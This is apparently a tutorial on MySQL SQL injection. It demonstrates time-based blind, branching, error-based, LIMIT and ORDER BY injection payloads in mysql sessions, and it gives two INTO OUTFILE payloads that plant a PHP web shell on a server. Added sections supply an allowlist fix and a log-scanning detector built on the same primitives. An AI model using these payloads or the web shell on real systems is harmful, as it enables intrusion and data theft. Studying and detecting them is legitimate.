mysql> select * from testdata where id = 1 and 1 and sleep(1);
Empty set (2.01 sec)
mysql> select * from testdata where id = 1 and 0 and sleep(1);
Empty set (0.00 sec)
The positions of the 1 and the 0 are where we can insert our conditional expression.
2. Short-circuit behaviour of or 1
mysql> select * from testdata where id = 1 or 0 or sleep(1);
+----+------+-------+
| id | name | pass  |
+----+------+-------+
|  1 | adad | afdsf |
|  1 | adad | afdsf |
+----+------+-------+
2 rows in set (2.01 sec)

mysql> select * from testdata where id = 1 or 1 or sleep(1);
+----+--------+----------+
| id | name   | pass     |
+----+--------+----------+
|  2 | adsads | dfadf    |
|  3 | fas    | agfsdfas |
|  1 | adad   | afdsf    |
|  1 | adad   | afdsf    |
+----+--------+----------+
4 rows in set (0.00 sec)
Once or 1 is evaluated, the remaining conditions are not checked, so sleep() is never executed.
Besides the two forms above, we can also use the CASE WHEN ... THEN ... ELSE ... END construct, which behaves much like IF.
3. Branching behaviour of elt()
ELT(N ,str1 ,str2 ,str3 ,…)
Function description: if N = 1 the return value is str1, if N = 2 the return value is str2, and so on. If N is less than 1 or greater than the number of arguments, the return value is NULL. ELT() is the complement of FIELD().
mysql> select * from testdata where id = 1 and elt((1>1)+1,1=1,sleep(1));
+----+------+-------+
| id | name | pass  |
+----+------+-------+
|  1 | adad | afdsf |
|  1 | adad | afdsf |
+----+------+-------+
2 rows in set (0.01 sec)

mysql> select * from testdata where id = 1 and elt((1=1)+1,1=1,sleep(1));
Empty set (2.01 sec)

mysql> select * from testdata where id = 2 and field(1>1,sleep(2));
+----+--------+-------+
| id | name   | pass  |
+----+--------+-------+
|  2 | adsads | dfadf |
+----+--------+-------+
1 row in set (2.00 sec)

mysql> select * from testdata where id = 2 and field(1=1,sleep(2));
Empty set (2.00 sec)
The above are the basics.
5. between ... and injection
select password from users where password between 'a' and 'd'
limit injection
Injection after the LIMIT clause
Two keywords can follow LIMIT: PROCEDURE and INTO. INTO cannot be exploited unless you already have the privilege to write a shell to disk, so the question is whether PROCEDURE can be used for injection. Let's give it a try:
Error-based:
mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)
order by injection
This section covers the case where the controllable position is after the ORDER BY clause, for example when the order parameter is user-controlled: select * from goods order by $_GET['order']
1. If error messages are output, you can try to complete the SQL injection attack through error-based injection.
mysql> select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0));
ERROR 1105 (HY000): XPATH syntax error: '~security'   // retrieves the current database name
2. If there is no echo, you can try blind injection techniques instead.
select * from users order by id ^(select(select version()) regexp '^5');
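The order parameter sits in a position that a prepared statement cannot bind, which is exactly why it is injectable. As an added example (not code from the original post), the following shows the string concatenation that reproduces order by $_GET['order'] beside the allowlist-based fix, using a constructed in-memory SQLite table named goods with the assumed columns id, name and price:

```python
import sqlite3

# Constructed sample table standing in for the post's "goods" table.
# The column names are an assumption, not the original schema.
CONN = sqlite3.connect(":memory:")
CONN.executescript(
    """
    CREATE TABLE goods (id INTEGER, name TEXT, price REAL);
    INSERT INTO goods VALUES (1, 'pen', 2.5), (2, 'book', 12.0), (3, 'bag', 30.0);
    """
)


def vulnerable_order_query(order_param: str) -> str:
    """Builds the statement the same way `order by $_GET['order']` does:
    the raw parameter is concatenated in, so anything the client sends
    (error-based or blind payloads included) becomes part of ORDER BY."""
    return "SELECT * FROM goods ORDER BY " + order_param


# ORDER BY cannot be parameterised, so the fix is an allowlist of what the
# client is permitted to choose: a known column and an optional direction.
ALLOWED_ORDER_COLUMNS = {"id", "name", "price"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def safe_order_query(order_param: str) -> str:
    """Maps the client's choice onto trusted SQL fragments; anything that is
    not exactly `<column>` or `<column> <asc|desc>` is rejected."""
    parts = order_param.strip().split()
    if not 1 <= len(parts) <= 2:
        raise ValueError("invalid order parameter")
    column = parts[0].lower()
    direction = parts[1].upper() if len(parts) == 2 else "ASC"
    if column not in ALLOWED_ORDER_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("invalid order parameter")
    # Only allowlisted literals reach the statement; the client's bytes never do.
    return f"SELECT * FROM goods ORDER BY {column} {direction}"


def fetch_ordered(order_param: str) -> list:
    """Runs the hardened query and returns the rows as tuples."""
    return CONN.execute(safe_order_query(order_param)).fetchall()


if __name__ == "__main__":
    print(fetch_ordered("price desc"))
    injected = "id and(updatexml(1,concat(0x7e,(select database())),0))"
    print(vulnerable_order_query(injected))  # the payload lands in the statement
    try:
        safe_order_query(injected)
    except ValueError as exc:
        print("rejected:", exc)
```

The allowlist approach generalises to any position that prepared statements cannot cover (column names, table names, sort direction, LIMIT values): validate the input against a fixed set and build the SQL from trusted fragments, never from the request bytes.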
Time-based blind injection
The idea behind time-based blind injection is delayed injection: the time a statement takes to execute tells you whether the condition evaluated to true or false, and you fuzz from there.
The methods we commonly use are sleep() and benchmark().
In my table the id field is numeric while name and pass are both varchar, so the usage differs; but blind injection needs no echo at all, you only have to look at how long the response takes.
mysql> select * from testdata where name = 1-sleep(1);
Empty set, 4 warnings (4.01 sec)

mysql> select * from testdata where name = sleep(1);
+----+--------+----------+
| id | name   | pass     |
+----+--------+----------+
|  2 | adsads | dfadf    |
|  3 | fas    | agfsdfas |
|  1 | adad   | afdsf    |
|  1 | adad   | afdsf    |
+----+--------+----------+
4 rows in set, 4 warnings (4.01 sec)
mysql> select * from testdata where name = benchmark(100000000,rand());
+----+--------+----------+
| id | name   | pass     |
+----+--------+----------+
|  2 | adsads | dfadf    |
|  3 | fas    | agfsdfas |
|  1 | adad   | afdsf    |
|  1 | adad   | afdsf    |
+----+--------+----------+
4 rows in set, 4 warnings (7.59 sec)
With union:
id=2) union select 1,2,3,4,5,6,7,'<?php assert($_POST["cmd"]);?>' into outfile '/home/wwwroot/shadowyspirits/evil.php'%23
Without union:
id=2) into outfile '/home/wwwroot/shadowyspirits/evil.php' fields terminated by '<?php assert($_POST["cmd"]);?>'%23
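Every primitive used on this page (sleep()/benchmark() for delays, elt()/field()/if/case for branching, extractvalue()/updatexml() for error-based extraction, LIMIT ... PROCEDURE analyse, and INTO OUTFILE for file writes) is rare in SQL that an application generates itself, so the same functions double as detection signatures in the general or slow query log. The following added example, not code from the original post, scans constructed slow-log style records (query time in seconds plus SQL text, modelled on the sessions above) for those functions and additionally flags a delay primitive whose execution was genuinely slow; the record format and the one-second threshold are assumptions:

```python
import re

# Constructed records in (query_time_seconds, sql_text) form; the SQL mirrors
# the queries shown on this page, the timings are made up for illustration.
SAMPLE_LOG = [
    (0.00, "select * from testdata where id = 1"),
    (2.01, "select * from testdata where id = 1 and 1 and sleep(1)"),
    (2.01, "select * from testdata where id = 1 and elt((1=1)+1,1=1,sleep(1))"),
    (7.59, "select * from testdata where name = benchmark(100000000,rand())"),
    (0.01, "SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 "
           "procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)"),
    (0.02, "select * from users order by id and(updatexml(1,concat(0x7e,(select database())),0))"),
    (0.03, "select name from goods order by price desc"),
]

# Injection primitives grouped by the technique they belong to. The
# "conditional-branch" group is the noisiest (IF() is also used legitimately),
# so it is most useful when it co-occurs with another indicator.
SIGNATURES = {
    "time-delay": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "conditional-branch": re.compile(r"\b(elt|field|if)\s*\(|\bcase\s+when\b", re.I),
    "error-based": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "limit-procedure": re.compile(r"\bprocedure\s+analyse\s*\(", re.I),
    "file-write": re.compile(r"\binto\s+(outfile|dumpfile)\b", re.I),
}

# Assumed threshold: a delay primitive plus a query slower than this is the
# strongest sign that a time-based probe actually fired.
SLOW_THRESHOLD_SECONDS = 1.0


def classify(query_time: float, sql: str) -> list:
    """Returns the indicator names that apply to one log record, in
    SIGNATURES order, plus a combined slow+delay indicator when warranted."""
    hits = [name for name, pattern in SIGNATURES.items() if pattern.search(sql)]
    if "time-delay" in hits and query_time >= SLOW_THRESHOLD_SECONDS:
        hits.append("slow-with-delay-primitive")
    return hits


def scan(log: list) -> list:
    """Runs classify() over every record and keeps only the suspicious ones."""
    findings = []
    for query_time, sql in log:
        hits = classify(query_time, sql)
        if hits:
            findings.append({"query_time": query_time, "sql": sql, "indicators": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['query_time']:6.2f}s  {finding['indicators']}  {finding['sql'][:60]}")
```

In practice this runs against the MySQL general log or slow log (with long_query_time lowered so short sleep() probes are still recorded), and a burst of many slow queries from one client that all contain a delay primitive is the characteristic shape of a time-based blind extraction.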